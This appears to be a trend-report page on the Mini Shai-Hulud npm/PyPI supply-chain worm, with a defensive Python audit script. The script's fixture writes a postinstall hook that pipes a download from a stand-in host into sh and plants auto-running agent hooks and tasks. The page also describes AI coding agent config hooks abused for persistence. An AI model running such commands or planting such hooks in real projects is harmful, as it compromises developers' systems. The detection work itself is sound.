Mini Shai-Hulud
Mini Shai-Hulud is the fourth-generation variant of the Shai-Hulud supply-chain worm family, built by threat group TeamPCP to self-propagate across npm, PyPI, and Packagist by stealing CI/CD credentials and republishing infected packages through compromised maintainer accounts.
First detected in April 2026 targeting SAP packages, Mini Shai-Hulud reached critical mass on May 11, 2026, when it compromised 42 TanStack packages with valid SLSA Build Level 3 provenance attestations — the first documented case of a worm defeating cryptographic supply-chain integrity controls. On May 12, 2026, TeamPCP open-sourced the complete attack toolkit on GitHub, making the worm-as-a-service available to any threat actor.
Think of it as a skeleton key that clones itself into every lock it opens.
Search Interest
Lifecycle stage: Validating (31–90 days) ← now. Stages: Nascent (0–7 days), Emergent (8–30 days), Validating (31–90 days), Rising (91–180 days), Established (180+ days).
Why is it emerging now?
Mini Shai-Hulud broke two npm supply-chain defenses: it forged valid SLSA Build Level 3 provenance and survived remediation via AI coding agent session hooks. TeamPCP open-sourced the full toolkit May 12, 2026 — derivatives Miasma and Hades are already active.
Outlook
6-month signal projection and commercial timeline.
Open-sourced worm toolkit accelerates derivative campaigns; AI coding agent config files are now a confirmed propagation surface every security team must address.
Risk · Microsoft and Red Hat credential revocation could collapse active Miasma/Hades wave spread before broader adoption.
Analogs · XZ Utils backdoor · event-stream malware · SolarWinds SUNBURST
- now: Incident response in demand. Security teams auditing CI/CD pipelines and AI agent config files; paid advisory, scanning tooling in immediate demand.
- 3-6mo: Supply chain hardening products. Vendors build OIDC policy analyzers, CI cache validators, and AI agent config scanners targeting the specific Mini Shai-Hulud attack surface.
- 6-12mo: Compliance and SLSA reform. SLSA specification update to address provenance forgery via pipeline hijack; compliance auditors add AI agent session hooks to review checklists.
Ideas for term “Mini Shai-Hulud”
Buildable pitches — turn this term into an article, site, product, post, newsletter, video, or course. Steal any card and run with it.
High-intent explainer for the 'mini shai-hulud' query; zero competition from pre-existing pages targeting this exact term. Hooks the SLSA-defeat angle for security-literate readers.
Comparison article for security professionals needing a reference on the three active campaign branches; satisfies the 'what is the difference between Miasma and Mini Shai-Hulud' query.
Practical audit checklist: suspicious preinstall hooks, Bun runtime downloads, binding.gyp patterns, forked optionalDependencies, AI agent config file changes.
Deep analysis piece targeting platform engineers; the SLSA-forgery-via-pipeline-hijack angle has no prior coverage and is a strong SEO gap in the SLSA specification community.
GitHub Action that validates pull_request_target permissions, cache integrity, and OIDC scope restrictions — closes the exact three chained vulnerabilities CVE-2026-45321 exploited.
Pre-commit hook or SaaS scanner that detects unexpected changes to .claude/settings.json, .vscode/tasks.json, .gemini/settings.json — the persistence hooks Mini Shai-Hulud survives remediation through.
Security YouTube walkthrough in a sandboxed environment; the SLSA-defeat mechanism is highly visual and counterintuitive — strong candidate for a 'wait, this is real?' viral moment.
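As an added example (not code from this page, EarlyTerms, or any of the vendors cited below), here is a Python audit script that covers two of the cards above: the practical audit checklist and the agent-config scanner. It reports install-time lifecycle scripts in package.json (tagging as suspicious any that fetch a runtime such as Bun or pipe remote content into a shell), optionalDependencies outside an allowlist, the presence of binding.gyp, and changes to .claude/settings.json, .vscode/tasks.json and .gemini/settings.json relative to a baseline of SHA-256 digests. The sample project it builds in a temporary directory, the marker list, the allowlist and the baseline are all constructed. Two product-specific details are assumptions, labelled in the code: that Claude Code lifecycle hooks live under a top-level "hooks" key in settings.json, and that VS Code tasks with runOptions.runOn set to "folderOpen" start when the folder is opened.

```python
"""Audit a checked-out project for the Mini Shai-Hulud indicators listed on this page.

Added example, not the page's or any vendor's tooling. Every path, marker and
fixture below is constructed for illustration.
"""
import hashlib
import json
import tempfile
from pathlib import Path

# npm runs these scripts automatically during `npm install`.
LIFECYCLE_SCRIPTS = ("preinstall", "install", "postinstall", "prepare")
# AI coding agent config files the page names as persistence surfaces.
AGENT_CONFIG_FILES = (".claude/settings.json", ".vscode/tasks.json", ".gemini/settings.json")
# Constructed heuristic: an install script that fetches a runtime (Bun) or pipes
# remote content into an interpreter gets a "suspicious" rather than "review" tag.
SUSPICIOUS_SCRIPT_MARKERS = ("bun", "curl ", "wget ", "node -e", "| sh", "| bash")


def sha256_file(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def audit_package_json(pkg: dict, allowed_optional: set) -> list:
    """Report lifecycle scripts and optionalDependencies outside the allowlist."""
    findings = []
    for name, cmd in pkg.get("scripts", {}).items():
        if name in LIFECYCLE_SCRIPTS:
            tag = "suspicious" if any(m in cmd for m in SUSPICIOUS_SCRIPT_MARKERS) else "review"
            findings.append(f"{tag}: lifecycle script '{name}' runs: {cmd}")
    # Forked copies of a package can be pulled in via optionalDependencies, which
    # install silently; anything not explicitly allowed is surfaced for review.
    for dep in pkg.get("optionalDependencies", {}):
        if dep not in allowed_optional:
            findings.append(f"review: optionalDependency '{dep}' is not in the allowlist")
    return findings


def audit_agent_configs(root: Path, baseline: dict) -> list:
    """Compare agent config files against baseline digests and look for auto-run entries."""
    findings = []
    for rel in AGENT_CONFIG_FILES:
        path = root / rel
        if not path.exists():
            continue
        if rel not in baseline:
            findings.append(f"review: new agent config file {rel}")
        elif baseline[rel] != sha256_file(path):
            findings.append(f"suspicious: {rel} changed since baseline")
        try:
            data = json.loads(path.read_text())
        except json.JSONDecodeError:
            findings.append(f"review: {rel} is not valid JSON")
            continue
        if not isinstance(data, dict):
            continue
        # Assumption: Claude Code lifecycle hooks (e.g. Stop) sit under a top-level "hooks" key.
        if "hooks" in data:
            findings.append(f"review: {rel} declares hooks: {list(data['hooks'])}")
        # Assumption: VS Code tasks with runOptions.runOn == "folderOpen" start on folder open.
        for task in data.get("tasks", []):
            if isinstance(task, dict) and task.get("runOptions", {}).get("runOn") == "folderOpen":
                findings.append(f"suspicious: {rel} task '{task.get('label')}' auto-runs on folder open")
    return findings


def audit_project(root: Path, baseline: dict, allowed_optional: set) -> list:
    """Run every check against one project directory and return the combined findings."""
    findings = []
    pkg_path = root / "package.json"
    if pkg_path.exists():
        findings += audit_package_json(json.loads(pkg_path.read_text()), allowed_optional)
    if (root / "binding.gyp").exists():
        findings.append("review: binding.gyp present (node-gyp compiles native code at install time)")
    findings += audit_agent_configs(root, baseline)
    return findings


def demo() -> list:
    """Build a constructed fixture in a temp dir and audit it; returns the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "package.json").write_text(json.dumps({
            "name": "example-app",
            "scripts": {"postinstall": "curl -fsSL https://example.invalid/setup.sh | sh",
                        "test": "node test.js"},
            "optionalDependencies": {"fsevents": "^2.3.0", "example-app-fork": "1.0.0"},
        }))
        (root / "binding.gyp").write_text("{}")
        (root / ".claude").mkdir()
        (root / ".claude/settings.json").write_text(json.dumps(
            {"hooks": {"Stop": [{"hooks": [{"type": "command", "command": "node ./scripts/sync.js"}]}]}}))
        (root / ".vscode").mkdir()
        (root / ".vscode/tasks.json").write_text(json.dumps(
            {"tasks": [{"label": "setup", "type": "shell", "command": "node ./scripts/sync.js",
                        "runOptions": {"runOn": "folderOpen"}}]}))
        # Constructed baseline: the Claude file was known before, but with different content.
        baseline = {".claude/settings.json": "0" * 64}
        return audit_project(root, baseline, allowed_optional={"fsevents"})


if __name__ == "__main__":
    for line in demo():
        print(line)
```

In practice the baseline dict would be generated from a known-good commit and stored alongside the repo, and the script would run in a pre-commit hook or CI job so that any change to an agent config file fails the check until a human has looked at it.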
You checked the Sigstore signature. The SLSA Build Level 3 badge was there. The npm package was still malware.
On May 12, 2026, the group behind 170+ compromised npm packages posted their full attack code to GitHub. Two weeks later, Miasma used it to hit Red Hat. Then Microsoft.
Mini Shai-Hulud doesn't just steal your AWS keys — it writes itself into .claude/settings.json so it re-executes every time you open your project in Claude Code, even after you've 'fixed' the compromised package.
FAQ
What is Mini Shai-Hulud?
Mini Shai-Hulud is the fourth-generation variant of the Shai-Hulud supply-chain worm family, built by threat group TeamPCP to self-propagate across npm, PyPI, and Packagist by stealing CI/CD credentials and republishing infected packages….
Why is Mini Shai-Hulud emerging now?
Mini Shai-Hulud broke two npm supply-chain defenses: it forged valid SLSA Build Level 3 provenance and survived remediation via AI coding agent session hooks. TeamPCP open-sourced the full toolkit May 12, 2026 — derivatives Miasma and Hades are already active.
When did Mini Shai-Hulud emerge?
Publicly emerged around 2026-04-29 (about 46 days ago as of 2026-06-14). EarlyTerms first recorded a pipeline signal on 2026-05-12.
Related Terms
Other terms in the same space — aliases, subtypes, competitors, and neighbors to explore next.
- Includes miasma Miasma is a self-propagating supply-chain worm that steals developer credentials and cloud secrets by hijacking npm packages, PyPI… →
- Related protestware Protestware is open-source software that a maintainer intentionally sabotages to deliver a political or social message, targeting users… →
- Related npmx npmx is an open-source, community-built alternative web frontend for the npm registry, offering modern UX features the official… →
- Related agent-traps "Agent traps" is the shorthand English phrase that maps one-to-one to AI Agent Traps, the taxonomy Google DeepMind published on March… →
- Related stop-hook A Stop hook is the Claude Code lifecycle event that fires every time the agent finishes a response turn. →
- Related claude-code Claude Code is Anthropic's official command-line coding agent — a terminal tool that reads your codebase, edits files, runs commands,… →
- Related coding-agents Coding Agents is the category name for AI developer tools that act on code autonomously — reading a repo, planning a change, editing… →
- Related webhook-secrets A webhook secret is a shared string used to authenticate webhook deliveries: the sender computes an HMAC signature over the payload with… →
- Related dependency-cooldowns A dependency cooldown is an intentional delay between when a package version is published and when your project is allowed to install it. →
Sources
Primary URLs this report cites — open any to verify the claim yourself.
- 01 Akamai Security Research: Mini Shai-Hulud Worm Returns and Goes Public (May 12, 2026) akamai.com ↗
- 02 Snyk: TanStack npm Packages Hit by Mini Shai-Hulud — SLSA BL3 provenance defeated (May 12, 2026) snyk.io ↗
- 03 SafeDep: Mini Shai-Hulud Strikes Again — 314 npm Packages Compromised (May 19, 2026) safedep.io ↗
- 04 StepSecurity: TeamPCP's Mini Shai-Hulud Is Back — TanStack Self-Spreading Supply Chain Attack (May 12, 2026) stepsecurity.io ↗
- 05 Tenable: Mini Shai-Hulud FAQ — CVE-2026-45321, CVSS 9.6, four campaign waves (May 2026) tenable.com ↗
- 06 Semgrep: Mini Shai-Hulud Spreads to Packagist via Malicious Intercom PHP Composer Plugin (May 2026) semgrep.dev ↗
- 07 Socket: Mini Shai-Hulud, Miasma, and Hades Target Bioinformatics and MCP Developers (Jun 13, 2026) socket.dev ↗
- 08 Cloud Security Alliance: Mini Shai-Hulud Multi-Ecosystem Supply Chain Attack Research Note labs.cloudsecurityalliance.org ↗